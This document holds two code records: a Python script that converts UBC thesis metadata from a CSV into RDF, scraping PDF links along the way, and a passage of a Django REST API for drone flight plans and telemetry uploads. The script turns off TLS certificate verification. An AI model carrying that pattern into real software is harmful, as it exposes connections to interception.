{"seq_id":"558853443","text":"from rdflib import URIRef, Graph, Literal, Namespace\nfrom rdflib.namespace import RDF, FOAF, DC, SKOS, RDFS, OWL\nimport urllib.parse\nimport re\nfrom urllib.request import urlopen, urlparse\nfrom bs4 import BeautifulSoup\nimport ssl\nimport pickle\nimport hashlib\nimport unidecode\nimport difflib\nimport sys\nimport os\nimport csv\nimport datetime\nimport urllib.request\nfrom langdetect import detect\nfrom io import StringIO, BytesIO\nfrom PyPDF2.pdf import PdfFileReader\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\ncontext = ssl._create_unverified_context()\ninput_graph = Graph()\ng = Graph() # output graph\n\nDC = Namespace(\"http://purl.org/dc/terms/\")\nREL = Namespace(\"http://id.loc.gov/vocabulary/relators/\")\nBIBO = Namespace(\"http://purl.org/ontology/bibo/\")\nSCHEMA = Namespace(\"http://schema.org/\")\nFRBR = Namespace(\"http://purl.org/vocab/frbr/core#\")\nCWRC = Namespace(\"http://sparql.cwrc.ca/ontologies/genre#\")\nPROV = Namespace(\"http://www.w3.org/ns/prov#\")\nCLDI = Namespace(\"http://canlink.library.ualberta.ca/ontologies/canlink#\")\nDOAP = Namespace(\"http://usefulinc.com/ns/doap#\")\nVOID = Namespace(\"http://rdfs.org/ns/void#\")\n\ng.bind(\"dc\", DC)\ng.bind(\"foaf\", FOAF)\ng.bind(\"rdf\", RDF)\ng.bind(\"rel\", REL)\ng.bind(\"frbr\", FRBR)\ng.bind(\"bibo\", BIBO)\ng.bind(\"schema\", SCHEMA)\ng.bind(\"skos\", SKOS)\ng.bind(\"rdfs\", RDFS)\ng.bind(\"owl\", OWL)\ng.bind(\"cwrc\", CWRC)\ng.bind(\"prov\", 
PROV)\ng.bind(\"cldi\", CLDI)\ng.bind(\"doap\", DOAP)\ng.bind(\"void\", VOID)\n\nwith open(\"files/subjects.pickle\", \"rb\") as handle:\n    subjects = pickle.load(handle)\n\n\ndef getDegreeUri(degree):\n    if not degree:\n        return None\n\n    if \"in\" in degree.split():\n        degree = \" \".join(degree.split()[:degree.split().index(\"in\")])\n\n    if \",\" in degree:\n        degree = \" \".join(degree[:degree.index(\",\")].split())\n\n    if \"-\" in degree:\n        degree = \" \".join(degree[:degree.index(\"-\")].split())\n\n    degree = ''.join([i for i in degree if i.isalpha()]).lower()\n    uri = None\n    label = None # label = MSc for degree = msc\n\n    # check for longer sentences if the keywords aren't available\n    degrees = {\"masterofscience\": [\"MSc\", \"http://purl.org/ontology/bibo/degrees/ms\"],\n               \"masterofarts\": [\"MA\", \"http://purl.org/ontology/bibo/degrees/ma\"],\n               \"masteroffinearts\": [\"MFA\", \"http://canlink.library.ualberta.ca/thesisDegree/mfa\"],\n               \"masterofappliedscience\": [\"MASc\", \"http://canlink.library.ualberta.ca/thesisDegree/masc\"],\n               \"masteroflaws\": [\"LLM\", \"http://canlink.library.ualberta.ca/thesisDegree/llm\"],\n               \"masterofenvironmentalstudies\": [\"MEnv\", \"http://canlink.library.ualberta.ca/thesisDegree/menv\"],\n               \"masterofeducation\": [\"MEd\", \"http://canlink.library.ualberta.ca/thesisDegree/med\"],\n               \"masterofnursing\": [\"MN\", \"http://canlink.library.ualberta.ca/thesisDegree/mn\"],\n               \"masterofarchitecture\": [\"MArch\", \"http://canlink.library.ualberta.ca/thesisDegree/march\"],\n               \"masterofmathematics\": [\"MMath\", \"http://canlink.library.ualberta.ca/thesisDegree/mmath\"],\n               \"masterofhealthstudies\": [\"MHStud\", \"http://canlink.library.ualberta.ca/thesisDegree/mhstud\"],\n               \"masterofcounselling\": [\"MCoun\", \"http://canlink.library.ualberta.ca/thesisDegree/mcoun\"],\n               \"masterofengineering\": [\"MEng\", \"http://canlink.library.ualberta.ca/thesisDegree/meng\"],\n               \"masterofadvancedstudies\": [\"MAS\", \"http://canlink.library.ualberta.ca/thesisDegree/mas\"],\n               \"masterofphysicaleducation\": [\"MPhysEd\", \"http://canlink.library.ualberta.ca/thesisDegree/mphysed\"],\n               \"masterofbusinessadministration\": [\"MBA\", \"http://canlink.library.ualberta.ca/thesisDegree/mba\"],\n               \"masterofworshipstudies\": [\"MWS\", \"http://canlink.library.ualberta.ca/thesisDegree/mws\"],\n               \"doctorofphilosophy\": [\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"],\n               \"doctoralthesis\": [\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"],\n               \"doctorofbusinessadministration\": [\"DBA\", \"http://canlink.library.ualberta.ca/thesisDegree/dba\"],\n               \"doctorofscience\": [\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"],\n               \"doctor\": [\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"]}\n\n\n    if \"master\" in degree or \"doctor\" in degree:\n        match = difflib.get_close_matches(\n            degree, degrees.keys(), n=1, cutoff=0.90)\n        if match:\n            return(degrees[match[0]][0], degrees[match[0]][1])\n\n        # # NOTE modification just for this dataset\n        # if \"-\" in degree:\n        #     label = degree.split(\"-\")[1]\n        #     return([label, \"http://canlink.library.ualberta.ca/thesisDegree/\"+label.lower()])\n        # # TODO IMPLEMENT A USER INPUT FOR THE DEGREES THAT CAN'T BE FOUND (MUSIC)\n        #\n        # return([input(\"Enter Label for \" + degree + \": \"), \"http://canlink.library.ualberta.ca/thesisDegree/\"+input(\"Enter Code for \" + degree + \": \")])\n\n        if \"master\" in degree:\n            return([\"Master\", \"http://canlink.library.ualberta.ca/thesisDegree/master\"])\n        return([\"PhD\", 
\"http://canlink.library.ualberta.ca/thesisDegree/phd\"])\n\n # do the basic ones\n degree_codes = {\n \"maîtrise\":[\"Master\", \"http://canlink.library.ualberta.ca/thesisDegree/master\"],\n \"mphysed\":[\"MPhysEd\", \"http://canlink.library.ualberta.ca/thesisDegree/mphysed\"],\n \"menvsc\":[\"MEnv\", \"http://canlink.library.ualberta.ca/thesisDegree/menv\"],\n \"mdent\":[\"MDent\", \"http://canlink.library.ualberta.ca/thesisDegree/mdent\"],\n \"maît\":[\"Master\", \"http://canlink.library.ualberta.ca/thesisDegree/master\"],\n \"maed\":[\"MAEd\", \"http://canlink.library.ualberta.ca/thesisDegree/maed\"],\n \"meng\":[\"MEng\", \"http://canlink.library.ualberta.ca/thesisDegree/meng\"],\n \"mdes\":[\"MDes\", \"http://canlink.library.ualberta.ca/thesisDegree/mdes\"],\n \"dent\":[\"MDent\", \"http://canlink.library.ualberta.ca/thesisDegree/mdent\"],\n \"masc\":[\"MASc\", \"http://canlink.library.ualberta.ca/thesisDegree/masc\"],\n \"msc\":[\"MSc\", \"http://purl.org/ontology/bibo/degrees/ms\"],\n \"llm\":[\"LLM\", \"http://canlink.library.ualberta.ca/thesisDegree/llm\"],\n \"lld\":[\"LLD\", \"http://canlink.library.ualberta.ca/thesisDegree/lld\"],\n \"mws\":[\"MWS\", \"http://canlink.library.ualberta.ca/thesisDegree/mws\"],\n \"mhk\":[\"MHK\", \"http://canlink.library.ualberta.ca/thesisDegree/mhk\"],\n \"mpp\":[\"MPP\", \"http://canlink.library.ualberta.ca/thesisDegree/mpp\"],\n \"mba\":[\"MBA\", \"http://canlink.library.ualberta.ca/thesisDegree/mba\"],\n \"mfa\":[\"MFA\", \"http://canlink.library.ualberta.ca/thesisDegree/mfa\"],\n \"sjd\":[\"SJD\", \"http://canlink.library.ualberta.ca/thesisDegree/sjd\"],\n \"edd\":[\"EDD\", \"http://canlink.library.ualberta.ca/thesisDegree/edd\"],\n \"med\":[\"MEd\", \"http://canlink.library.ualberta.ca/thesisDegree/med\"],\n \"phd\":[\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"],\n \"dba\":[\"DBA\", \"http://canlink.library.ualberta.ca/thesisDegree/dba\"],\n \"dsc\":[\"DSc\", \"http://canlink.library.ualberta.ca/thesisDegree/dsc\"],\n \"des\":[\"Des\", \"http://canlink.library.ualberta.ca/thesisDegree/des\"],\n \"msw\":[\"MSW\", \"http://canlink.library.ualberta.ca/thesisDegree/msw\"],\n \"ma\":[\"MA\", \"http://purl.org/ontology/bibo/degrees/ma\"],\n \"mn\":[\"MN\", \"http://canlink.library.ualberta.ca/thesisDegree/mn\"],\n \"docteur\":[\"PhD\", \"http://purl.org/ontology/bibo/degrees/phd\"]\n }\n\n for code in degree_codes:\n if code in degree:\n return(degree_codes[code][0], degree_codes[code][1])\n\n\ndef getPDFUrl(url):\n try:\n html_object = urlopen(url, context=context)\n html_doc = html_object.read()\n soup = BeautifulSoup(html_doc, \"html.parser\")\n\n pdf_url = \"\"\n # find all the .pdf links in the page\n for link in soup.find_all(\"a\"):\n l = link.get(\"href\")\n if \"pdf\" in str(l):\n pdf_url = str(l)\n\n contentUrl = pdf_url\n # convert relative links to absolute links if necessary\n if pdf_url and \"http\" not in pdf_url and \"www\" not in pdf_url:\n redirect_url = html_object.geturl()\n if pdf_url[0] == \"/\":\n # append to the base of the redirect url\n base_url = '{uri.scheme}://{uri.netloc}'.format(\n uri=urlparse(redirect_url))\n contentUrl = base_url + pdf_url\n else:\n # append to the end of the redirect url\n contentUrl = redirect_url + pdf_url\n\n return contentUrl\n except:\n return None\n\n\nstart_time = datetime.datetime.now().isoformat()[:-7] + \"Z\"\nruntime = \"http://canlink.library.ualberta.ca/runtime/\"+hashlib.md5(start_time.encode()).hexdigest()\n\nreader = csv.reader(open(\"files/ubc.csv\", \"r\", 
encoding=\"latin-1\"))\nnext(reader) # skip the title\nfor row in reader:\n subject_uris = {}\n author = None\n degree = None\n title = None\n url = None\n degree_uri = None\n degree_label = None\n contentUrl = None\n manifestation = None\n date = None\n language = None\n abstract = None\n advisor = None\n num_pages = None\n\n\n author = max(row[0], row[1])\n try:\n date = int(row[2])\n except:\n date = None\n\n degree = row[3]\n\n # if the abstract isn't available then message goes in [ ]\n if row[4] and row[4][0] != \"[\" and row[4][-1] != \"]\" and len(row[4]) > 30:\n abstract = row[4].replace(\"\\n\", \"\")\n else:\n abstract = None\n url = row[5]\n contentUrl = getPDFUrl(url)\n\n try:\n r = requests.get(contentUrl)\n f = BytesIO(r.content)\n num_pages = PdfFileReader(f).getNumPages()\n print(num_pages)\n except:\n pass\n\n\n if row[6]:\n language = \"http://id.loc.gov/vocabulary/languages/\" + row[6]\n\n subject_names = [i for i in row[7].split(\"||\")+row[8].split(\"||\") if i]\n subject_uris = {}\n for subject in subject_names:\n if subject.lower() in subjects.keys():\n subject_uris[subject] = subjects[subject.lower()]\n else:\n subject_uris[subject] = None\n\n title = row[9]\n\n author_uri = row[10]\n if not author_uri and row[11]: author_uri = row[11]\n if not author_uri and row[12]: author_uri = row[12]\n\n university_uri = \"http://dbpedia.org/resource/University_of_British_Columbia\"\n\n\n if not title or not language or not degree or not author or not date:\n print(\"ERROR\\n\\n\\n\\n\\n\")\n\n\n uri = \"http://canlink.library.ualberta.ca/thesis/\"+str(hashlib.md5((str(author).encode(\"utf-8\") + str(title).encode(\"utf-8\"))).hexdigest())\n\n if contentUrl:\n manifestation = \"http://canlink.library.ualberta.ca/manifestation/\"+hashlib.md5(contentUrl.encode(\"utf-8\")).hexdigest()\n else:\n print(contentUrl, \"\\n\\n\")\n degree_label, degree_uri = getDegreeUri(degree)\n\n\n print(\"-\"*50)\n print(\"Author:\", author)\n print(\"Date:\", date)\n print(\"Degree:\", degree)\n print(\"URL:\", url)\n print(\"Content Url:\", contentUrl)\n print(\"Language:\", language)\n print(\"Subjects:\", subject_names)\n print(\"Subjects Uris:\", subject_uris)\n print(\"Title:\", title)\n print(\"Author_uri:\", author_uri)\n print(\"University:\", university_uri)\n print(\"Manifestation:\", manifestation)\n\n # title\n g.add((URIRef(uri), DC.title, Literal(title)))\n g.add((URIRef(uri), PROV.wasGeneratedBy, URIRef(runtime)))\n g.add((URIRef(uri), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\n # sameAs for the original handle url\n if url:\n g.add((URIRef(uri), OWL.sameAs, URIRef(url)))\n # date\n g.add((URIRef(uri), DC.issued, Literal(date, datatype=\"http://www.w3.org/2001/XMLSchema#gYear\")))\n # language\n g.add((URIRef(uri), DC.language, URIRef(language)))\n # degree\n g.add((URIRef(uri), BIBO.degree, URIRef(degree_uri)))\n g.add((URIRef(degree_uri), RDF.type, BIBO.thesisDegree))\n g.add((URIRef(degree_uri), RDFS.label, Literal(degree_label)))\n g.add((URIRef(degree_uri), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\n\n if \"canlink.library.ualberta.ca\" not in author_uri:\n provided_uri = author_uri\n author_uri = \"http://canlink.library.ualberta.ca/person/\"+str(hashlib.md5(author.encode(\"utf-8\")+university_uri.encode(\"utf-8\")).hexdigest())\n g.add((URIRef(author_uri), OWL.sameAs, URIRef(provided_uri)))\n\n g.add((URIRef(uri), DC.creator, URIRef(author_uri)))\n g.add((URIRef(uri), REL.aut, 
URIRef(author_uri)))\n # author type\n g.add((URIRef(author_uri), RDF.type, FOAF.Person))\n g.add((URIRef(author_uri), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\n g.add((URIRef(author_uri), PROV.wasGeneratedBy, URIRef(runtime)))\n # author name\n if \",\" in author:\n g.add((URIRef(author_uri), FOAF.lastName, Literal(author.split(\",\")[0].strip())))\n g.add((URIRef(author_uri), FOAF.firstName, Literal(author.split(\",\")[1].strip())))\n # add the full name in there as well for consistency\n g.add((URIRef(author_uri), FOAF.name, Literal(author.strip().replace(\",\",\"\"))))\n else:\n g.add((URIRef(author_uri), FOAF.name, Literal(author.strip())))\n\n # abstract\n if abstract:\n abstract_language = detect(abstract)\n g.add((URIRef(uri), BIBO.abstract, Literal(abstract, lang=abstract_language)))\n # publisher\n g.add((URIRef(uri), DC.publisher, URIRef(university_uri)))\n g.add((URIRef(uri), REL.pub, URIRef(university_uri)))\n # thesis types\n g.add((URIRef(uri), RDF.type, FRBR.Work))\n g.add((URIRef(uri), RDF.type, FRBR.Expression))\n g.add((URIRef(uri), RDF.type, SCHEMA.creativeWork))\n g.add((URIRef(uri), RDF.type, BIBO.thesis))\n g.add((URIRef(uri), CWRC.hasGenre, CWRC.genreScholarship))\n # subjects\n if subject_uris:\n for subject in subject_uris:\n # check if we have the uri for it - we made a dictionary and set the value to None if we couldn't find a uri\n if subject_uris[subject]:\n g.add((URIRef(uri), DC.subject, URIRef(subject_uris[subject])))\n else:\n # the subject uri couldn't be found for this\n newSubjectUri = \"http://canlink.library.ualberta.ca/subject/\" + hashlib.md5(subject.lower().encode(\"utf-8\")).hexdigest()\n\n g.add((URIRef(newSubjectUri), RDF.type, SKOS.Concept))\n g.add((URIRef(newSubjectUri), RDFS.label, Literal(subject.lower())))\n g.add((URIRef(newSubjectUri), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\n g.add((URIRef(uri), DC.subject, URIRef(newSubjectUri)))\n g.add((URIRef(newSubjectUri), PROV.wasGeneratedBy, URIRef(runtime)))\n # manifestation\n if manifestation:\n g.add((URIRef(manifestation), SCHEMA.encodesCreativeWork, URIRef(uri)))\n if contentUrl:\n g.add((URIRef(manifestation), SCHEMA.contentUrl, URIRef(contentUrl)))\n g.add((URIRef(manifestation), RDF.type, FRBR.Manifestation))\n g.add((URIRef(manifestation), RDF.type, SCHEMA.MediaObject))\n g.add((URIRef(manifestation), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\n g.add((URIRef(manifestation), PROV.wasGeneratedBy, URIRef(runtime)))\n\n if num_pages:\n g.add((URIRef(uri), BIBO.numPages, Literal(str(num_pages))))\n\nend_time = datetime.datetime.now().isoformat()[:-7] + \"Z\"\ng.add((URIRef(runtime), PROV.startedAtTime, Literal(start_time)))\ng.add((URIRef(runtime), PROV.endedAtTime, Literal(end_time)))\ng.add((URIRef(runtime), PROV.activity, CLDI.marclodconverter))\ng.add((URIRef(runtime), VOID.inDataset, URIRef(\"http://canlink.library.ualberta.ca/void/canlinkmaindataset\")))\ng.add((URIRef(runtime), RDF.type, PROV.Activity))\ng.add((URIRef(runtime), RDF.type, PROV.Generation))\ng.add((URIRef(runtime), PROV.actedOnBehalfOf, URIRef(\"http://canlink.library.ualberta.ca/ontologies/canlink#MaharshPatel\")))\n\n\nprint(g.serialize(format=\"xml\").decode(\"utf-8\"))\ng.serialize(\"ubc.xml\", format=\"xml\")\n # print(\"Abstract: \", 
abstract)\n","sub_path":"scripts/canlink-data/code/website/processing/ubc.py","file_name":"ubc.py","file_ext":"py","file_size_in_byte":16710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148409260","text":"import coreapi\nfrom django.core.files.storage import default_storage\nfrom django_filters import rest_framework as django_filters\nfrom django.core import serializers as s\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.utils import dateparse\nfrom django.conf import settings\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.core.validators import validate_email\nfrom django.db.models import Count, Case, Value, When\nfrom django.db.models.functions import Lower\nfrom django.core.exceptions import ValidationError\nfrom django.core.mail import send_mail\nfrom django.db.models.query_utils import Q\nfrom django.template import loader\nfrom django.http import JsonResponse\nfrom django.db import IntegrityError\nfrom django.http import Http404\n\nfrom datetime import datetime\nfrom datetime import time\n\nfrom rest_framework import viewsets\nfrom rest_framework import generics\nfrom rest_framework import mixins\nfrom rest_framework import status\nfrom rest_framework.decorators import action, detail_route, list_route, api_view, renderer_classes, permission_classes, authentication_classes\nfrom rest_framework.permissions import IsAuthenticated, SAFE_METHODS, AllowAny\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.response import Response\nfrom rest_framework.routers import DefaultRouter\nfrom rest_framework.schemas import AutoSchema, SchemaGenerator\nfrom rest_framework.reverse import reverse\nfrom rest_framework_swagger.renderers import OpenAPIRenderer, SwaggerUIRenderer\n\nfrom planner import assessment\nfrom planner import models\nfrom planner import serializers\nfrom planner import tasks\n\nimport waffle\n\nrouter = DefaultRouter()\nexternal_router = DefaultRouter(trailing_slash=False)\nassessment = assessment.Assess()\n\nclass BaseViewset(mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet):\n pass\n\n\nclass IsOperator(IsAuthenticated):\n def has_object_permission(self, request, view, obj):\n return (hasattr(obj, 'operator') and\n request.user.is_authenticated and\n request.user.operator == obj.operator)\n\nclass IsOperatorForAssessment(IsAuthenticated):\n def has_object_permission(self, request, view, obj):\n return (hasattr(request.user, 'operator') and\n request.user.is_authenticated and\n request.user.operator == obj.flight_plan.operator)\n\nclass IsOperatorOrReadOnly(IsOperator):\n def has_permission(self, request, view):\n return True # We only want to limit object-level permission here\n\n def has_object_permission(self, request, view, obj):\n return (request.method in SAFE_METHODS or\n super(IsOperatorOrReadOnly, self).has_object_permission(request, view, obj))\n\nclass IsExperimentalUser(IsAuthenticated):\n def has_permission(self, request, view):\n return waffle.flag_is_active(request, 'experimental_api')\n\n def has_object_permission(self, request, view, obj):\n is_authenticated = request.user.is_authenticated\n return is_authenticated and 
waffle.flag_is_active(request, 'experimental_api')\n\n\nclass Vehicles(BaseViewset):\n serializer_class = serializers.VehicleSerializer\n permission_classes = (IsOperatorOrReadOnly,)\n filter_fields = ('state', 'operator', 'vehicle_type', 'manufacturer')\n queryset = models.Vehicle.objects.all()\n\n def filter_queryset(self, queryset):\n queryset = super(Vehicles, self).filter_queryset(queryset)\n user = self.request.user\n\n # For non-public pages each operator can only see the vehicles registered under it's own account.\n if user.is_authenticated:\n queryset = queryset.exclude(~Q(operator=user.operator))\n\n return queryset.order_by('-created_at')\n\n\n def is_serial_number_valid(self, serial_number):\n # Checks if the vehicle with the serial number exists in their deactivated list\n if models.Vehicle.objects.filter(\n operator=self.request.user.operator,\n serial_number=serial_number,\n state=models.Vehicle.STATE_INACTIVE\n ).exists():\n return False\n else:\n return True\n\n\n def create(self, request):\n serializer = self.serializer_class(data=self.request.data)\n if serializer.is_valid():\n serial_number = serializer.validated_data.get('serial_number')\n if self.is_serial_number_valid(serial_number):\n return super(Vehicles, self).create(request)\n else:\n vehicle_id = models.Vehicle.objects.get(\n operator=self.request.user.operator,\n serial_number=serial_number,\n state=models.Vehicle.STATE_INACTIVE\n ).id\n return Response({'message': \"Vehicle exists with the same serial number\", \"vehicle_id\": vehicle_id}, 422)\n else:\n return Response(serializer.errors)\n\n\nrouter.register(r'vehicles', Vehicles, base_name='vehicle')\n\n\nclass AutoSchemaWithExtraFields(AutoSchema):\n def get_pagination_fields(self, path, method):\n fields = super(AutoSchemaWithExtraFields, self).get_pagination_fields(path, method)\n if path.endswith(\"uploads/init/\") or path.endswith(\"set_upload_complete/\"):\n fields += [\n coreapi.Field(\"id\", location=\"query\", description=\"The flight plan id\", required=True),\n coreapi.Field(\"type\", location=\"query\", description=\"The type of file to be uploaded (waypoints/telemetry).\", required=True),\n coreapi.Field(\"filename\", location=\"query\", description=\"The name of the file to be uploaded.\", required=True),\n coreapi.Field(\"size\", location=\"query\", description=\"The size of the file (in bytes) to be uploaded.\", required=True)\n ]\n\n if path.endswith(\"uploads/\") and method == 'POST':\n fields.append(coreapi.Field(\"timestamp\", location=\"query\", description=\"The timestamp you got with the upload URL\", required=True))\n\n if path.endswith(\"uploads/\") and method == 'GET':\n fields += [\n coreapi.Field(\"id\", location=\"query\", description=\"The WaypointMetadata id\", required=True),\n coreapi.Field(\"type\", location=\"query\", description=\"The type of file to be uploaded (waypoints/telemetry).\", required=True),\n ]\n\n # For Search\n if path.endswith(\"search_flights/\"):\n fields += [\n coreapi.Field(\"date_start\", location=\"query\", description=\"The start date\",),\n coreapi.Field(\"date_end\", location=\"query\", description=\"The end date\",),\n coreapi.Field(\"operator_id\", location=\"query\", description=\"The operator id\",),\n # coreapi.Field(\"timezone\", location=\"query\", description=\"Timezone\",),\n ]\n\n return fields\n\n\nclass FlightPlanFilterSet(django_filters.FilterSet):\n planned_departure_time_from = django_filters.DateTimeFilter(\n field_name='planned_departure_time', lookup_expr='gte')\n 
planned_departure_time_to = django_filters.DateTimeFilter(\n field_name='planned_departure_time', lookup_expr='lte')\n planned_arrival_time_from = django_filters.DateTimeFilter(\n field_name='planned_arrival_time', lookup_expr='gte')\n planned_arrival_time_to = django_filters.DateTimeFilter(\n field_name='planned_arrival_time', lookup_expr='lte')\n\n state = django_filters.BaseInFilter()\n\n class Meta:\n model = models.FlightPlan\n fields = [\n 'operator', 'vehicle', 'state',\n 'planned_departure_time_from', 'planned_departure_time_to',\n 'planned_arrival_time_from', 'planned_arrival_time_to'\n ]\n\n\nclass FlightPlans(BaseViewset):\n serializer_class = serializers.FlightPlanPostSerializer\n permission_classes = (IsOperatorOrReadOnly, )\n filter_class = FlightPlanFilterSet\n queryset = models.FlightPlan.objects.all().exclude(state=models.FlightPlan.STATE_DELETED)\n schema = AutoSchemaWithExtraFields()\n\n def filter_queryset(self, queryset):\n queryset = super(FlightPlans, self).filter_queryset(queryset)\n user = self.request.user\n\n # For non-public pages each operator can only see the flight plans registered under it's own account.\n if user.is_authenticated:\n queryset = queryset.exclude(~Q(operator=user.operator))\n\n return queryset.order_by('-planned_departure_time')\n\n def get_serializer_class(self):\n if self.request.method == 'GET':\n return serializers.FlightPlanGetSerializer\n else:\n return serializers.FlightPlanPostSerializer\n\n @detail_route(methods=['get'], permission_classes=[IsOperator])\n def invalidate_flight_plan(self, request, *args, **kwargs):\n \"\"\"\n Endpoint to invalidate flight plan\n \"\"\"\n flightplan = self.get_object()\n if flightplan:\n flightplan.state = models.FlightPlan.STATE_INVALID\n flightplan.save()\n return Response({'success': True}, status=status.HTTP_200_OK)\n\n @detail_route(methods=['delete'], permission_classes=[IsOperator])\n def waypoint(self, request, *args, **kwargs):\n \"\"\"\n Endpoint to remove waypoint\n \"\"\"\n flightplan = self.get_object()\n if flightplan:\n wp = flightplan.waypoints\n flightplan.waypoints = None\n wp.delete()\n flightplan.save()\n return Response({'success': True}, status=status.HTTP_200_OK)\n return Response({\"error\": \"Invalid flight plan.\"}, status=status.HTTP_400_BAD_REQUEST)\n\n def _get_telemetry(self, fp, fields=None, filter=None):\n if fields is None:\n fields = ('time', 'latitude', 'longitude', 'altitude', 'batt', 'voltage')\n query = fp.telemetry.telemetries\n if filter:\n query = query.filter(filter)\n query = query.order_by('time')\n # whitelist fields for extraction\n serial = s.serialize('python', query, fields=fields)\n return [d['fields'] for d in serial]\n\n @detail_route(methods=['get'], url_name=\"download-telemetry\")\n def download_telemetry(self, request, *args, **kwargs):\n \"\"\"\n Endpoint to download telemetry\n \"\"\"\n try:\n fp = self.get_object()\n except models.FlightPlan.DoesNotExist:\n raise Http404(\"Flight plan does not exist\")\n telemetry_list = []\n if fp.telemetry:\n telemetry_list = self._get_telemetry(fp)\n resp = JsonResponse({'telemetry': telemetry_list}, content_type='application/json')\n resp[\"Content-Disposition\"] = \"attachment; filename=\\\"telemetry_\" + fp.id + \".json\\\"\"\n return resp\n\n @list_route(methods=['post'], permission_classes=[IsOperator], url_path='uploads/init')\n def uploads_init(self, request, *args, **kwargs):\n id = request.data['params']['id'] or None\n type = request.data['params']['type'] or None\n path = None\n if type == 
'waypoints':\n path = models.document_path(request.user.operator, request.data['params']['filename'])\n elif type == 'telemetry':\n flightplan = models.FlightPlan.objects.get(pk=id)\n\n if request.user.operator != flightplan.operator:\n return Response({'error': \"Unauthorized\"}, status=401)\n\n path = models.document_path(flightplan, request.data['params']['filename'])\n if path:\n origin = \"http://localhost:3000\" if settings.LOCAL_DEV else \"%s://%s\" % (request.scheme, request.get_host())\n return Response(data={\n \"upload_url\": default_storage.bucket.blob(path['path']).create_resumable_upload_session(\n size=int(request.data['params']['size']),\n origin=origin),\n \"timestamp\": path['timestamp']\n })\n return Response({\"error\": \"Unknown type or id specified.\"}, status=404)\n\n @list_route(methods=['post', 'get'], permission_classes=[IsOperator])\n def uploads(self, request, *args, **kwargs):\n if (request.method == 'POST'):\n id = request.data['params']['id'] or None\n try:\n fp = models.FlightPlan.objects.get(pk=id)\n\n if request.user.operator != fp.operator:\n return Response({'error': \"Unauthorized\"}, status=401)\n\n except models.FlightPlan.DoesNotExist:\n # on new flight plans, a temporary invalid ID\n fp = None\n type = request.data['params']['type'] or None\n path = None\n if type == 'waypoints':\n path = models.document_path(\n request.user.operator,\n request.data['params']['filename'],\n timestamp=request.data['params']['timestamp']\n )\n wm = models.WaypointMetadata.objects.create(\n operator=request.user.operator,\n path=path['path'],\n flight_plan=fp\n )\n tasks.process_waypoints.delay(wm.id)\n return Response({\n \"success\": True,\n \"wm_id\": wm.id,\n \"url\": reverse(\"planner:plan-uploads\", request=request)+\"?id=%s&type=%s\" % (wm.id, 'waypoints')\n }, status=200)\n elif type == 'waypoints_array':\n # Validate data\n for waypoint in request.data['params']['waypoints']:\n data = {\n 'order': waypoint['order'],\n 'latitude': waypoint['latitude'],\n 'longitude': waypoint['longitude'],\n 'altitude_relative': waypoint['altitude_relative'],\n 'altitude': waypoint['altitude'],\n }\n\n serializer = serializers.WaypointSerializer(data=data)\n if not serializer.is_valid():\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n # Create task\n wm = models.WaypointMetadata.objects.create(\n operator=request.user.operator,\n path=None,\n flight_plan=fp,\n )\n tasks.process_waypoints.delay(wm.id, request.data['params']['waypoints'])\n return Response({\n \"success\": True,\n \"wm_id\": wm.id,\n \"url\": reverse(\"planner:plan-uploads\", request=request)+\"?id=%s&type=%s\" % (wm.id, 'waypoints')\n }, status=200)\n elif type == 'telemetry':\n path = models.document_path(\n fp,\n request.data['params']['filename'],\n timestamp=request.data['params']['timestamp']\n )\n tm = models.TelemetryMetadata.objects.create(\n flight_plan=fp,\n path=path['path'],\n state=models.TelemetryMetadata.STATE_UPLOADED\n )\n tasks.process_telemetry.delay(fp.id, tm.id)\n return Response({\n \"success\": True,\n \"tm_id\": tm.id,\n \"url\": reverse(\"planner:plan-uploads\", request=request)+\"?id=%s&type=%s\" % (tm.id, 'telemetry')\n }, status=200)\n if path is None or default_storage.exists(path['path']) is False:\n return Response({\"error\": \"Unable to find uploaded file\"}, status=400)\n return Response({\"error\": \"There's no flight plan with id %d\" % id}, status=404)\n elif request.method == 'GET':\n id = request.GET['id'] or None\n type = request.GET['type'] or 
None\n if type == 'waypoints':\n wm = models.WaypointMetadata.objects.filter(id=id).first() # filter().first() returns None when no row matches\n if wm is None:\n return Response({"error": "Not found"}, status=404)\n return Response({"success": True, "id": id, "type": type, "state": wm.state, "error": wm.error_message})\n elif type == 'telemetry':\n tm = models.TelemetryMetadata.objects.filter(id=id).first()\n if tm is None:\n return Response({"error": "Not found"}, status=404)\n return Response({"success": True, "id": id, "type": type, "state": tm.state, "error": tm.error_message})\n return Response({"error": "Invalid inputs"}, status=400)\n\n @detail_route(methods=["get"])\n def waypoints(self, *args, **kwargs):\n fp = self.get_object()\n return Response(data=serializers.WaypointMetadataSerializer(\n instance=fp.waypoints,\n ).data)\n\n @detail_route(methods=['get', 'delete'], permission_classes=[IsOperatorOrReadOnly])\n def telemetry(self, request, *args, **kwargs):\n """\n Endpoint to get or delete telemetry\n """\n if request.method == 'DELETE':\n flightplan = self.get_object()\n if flightplan:\n tm = flightplan.telemetry\n flightplan.telemetry = None\n tm.delete()\n flightplan.save()\n return Response({'success': True}, status=status.HTTP_200_OK)\n return Response({'error': 'Invalid flight plan'}, 